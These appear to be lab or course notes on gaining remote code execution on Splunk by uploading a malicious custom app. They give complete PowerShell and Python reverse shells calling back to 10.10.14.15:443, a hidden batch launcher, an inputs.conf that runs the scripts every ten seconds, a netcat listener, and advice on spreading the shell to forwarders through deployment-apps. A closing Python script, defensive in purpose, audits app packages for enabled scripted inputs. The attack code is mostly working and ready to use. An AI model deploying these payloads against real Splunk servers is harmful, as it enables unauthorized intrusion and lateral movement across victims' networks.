# Intro

- We can gain RCE on Splunk by creating a custom application to run Python, Batch, Bash, or PowerShell scripts
- From the `nmap` scans, we noticed that our target is a Windows server
- Since Splunk comes with Python installed, we can create a custom Splunk application that gives us RCE using Python or a PowerShell script

# Abusing Built-in Upload Functionality

- We can use [this](https://github.com/0xjpuff/reverse_shell_splunk) Splunk package to assist us
- The `bin` directory in this repo has examples for Python and PowerShell
- The `default` directory will have our `inputs.conf` file
- PowerShell one-liner below

```powershell
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

- The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) file tells Splunk which script to run and any other conditions
- Here we set the app as enabled and tell Splunk to run the script every 10 seconds

```bash
cat inputs.conf
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
```

## Targeting a Windows Host

- Since we are attacking Splunk on a Windows server, we need the `.bat` file

```batch
@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit
```

- Now create a tarball or `.spl` file

```bash
tar -cvzf updater.tar.gz splunk_shell/
```

- Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat)

```bash
sudo nc -lnvp 443
```

- Next, choose `Install app from file` and upload the application

![[images/Pasted image 20260123203013.png]]

- On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`

![[images/Pasted image 20260123203122.png]]

- As soon as we upload the application, a reverse shell is received, because the status of the application is automatically switched to `Enabled`

## Targeting a Linux Host

- If we were dealing with a Linux host, we would need to edit the `rev.py` Python script before creating the tarball and uploading the custom malicious app

```python
import sys,socket,os,pty
ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```

# Misc Environments

- If the compromised Splunk host is a deployment server, it will likely be possible to achieve RCE on any hosts with Universal Forwarders installed on them
- To push a reverse shell out to other hosts, the application must be placed in the `$SPLUNK_HOME/etc/deployment-apps` directory on the compromised host

# Exercise

- Clone the `reverse_shell_splunk` repo

```bash
sudo git clone https://github.com/0xjpuff/reverse_shell_splunk.git
```

![[images/Pasted image 20260123203806.png]]

![[images/Pasted image 20260123203839.png]]

- Edit `run.ps1` and `rev.py` to include the Kali IP and port
- Archive the directory

```bash
sudo tar -cvzf updater.tar.gz reverse_shell_splunk/
```

- Start a listener on the Kali box

![[images/Pasted image 20260123204902.png]]

- Go to `manage apps` from the dashboard

![[images/Pasted image 20260123204933.png]]

- Click on `install app from file`

![[images/Pasted image 20260123204954.png]]

- Upload the tarball

![[images/Pasted image 20260123205106.png]]

- We immediately catch a shell on the listener

![[images/Pasted image 20260123205158.png]]
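The whole technique hinges on the `[script://...]` stanzas in `inputs.conf` being enabled the moment an app is installed (or pushed from `deployment-apps`). The following added example, which is not part of these notes or the `reverse_shell_splunk` repo, audits an uploaded `.tar.gz`/`.spl` package for enabled scripted inputs and `bin/` payloads so a reviewer can flag such an app before it is installed or deployed; the package contents are constructed in memory and the file layout (`default/inputs.conf`, `bin/`) is the standard Splunk app structure.

```python
import configparser, io, tarfile

# Constructed sample inputs.conf mirroring the stanzas shown on the page, plus a benign monitor.
SAMPLE_INPUTS_CONF = """[script://./bin/rev.py]
disabled = 0
interval = 10
[script://.\\bin\\run.bat]
disabled = 0
interval = 10
[monitor:///var/log/app.log]
sourcetype = app_log
"""

def scripted_inputs(conf_text):
    """Return the enabled [script://...] stanzas found in an inputs.conf body."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    found = []
    for stanza in cp.sections():
        # Splunk treats a missing 'disabled' key as enabled, so default to "0"
        if stanza.startswith("script://") and cp[stanza].get("disabled", "0").strip() not in ("1", "true"):
            found.append({"script": stanza[len("script://"):],
                          "interval": cp[stanza].get("interval", "").strip()})
    return found

def build_sample_package():
    """Constructed in-memory .tar.gz app package (stand-in for an uploaded .spl)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in (("splunk_shell/default/inputs.conf", SAMPLE_INPUTS_CONF),
                           ("splunk_shell/bin/rev.py", "# placeholder\n"),
                           ("splunk_shell/bin/run.bat", "@ECHO OFF\n")):
            info = tarfile.TarInfo(name)
            info.size = len(body.encode())
            tar.addfile(info, io.BytesIO(body.encode()))
    return buf.getvalue()

def audit_app_package(tgz_bytes):
    """Report enabled scripted inputs (from default/ or local/ inputs.conf) and bin/ files,
    so a package can be reviewed before it is installed or pushed out to forwarders."""
    report = {"scripted_inputs": [], "bin_files": []}
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        for m in tar.getmembers():
            parts = m.name.split("/")
            if m.isfile() and parts[-1] == "inputs.conf" and parts[-2] in ("default", "local"):
                report["scripted_inputs"] += scripted_inputs(tar.extractfile(m).read().decode("utf-8", "replace"))
            elif m.isfile() and "bin" in parts[:-1]:
                report["bin_files"].append(m.name)
    return report
```

Any package whose report lists a scripted input with a short `interval` and a matching file under `bin/` deserves manual review before the app is enabled on the search head or placed in `deployment-apps`.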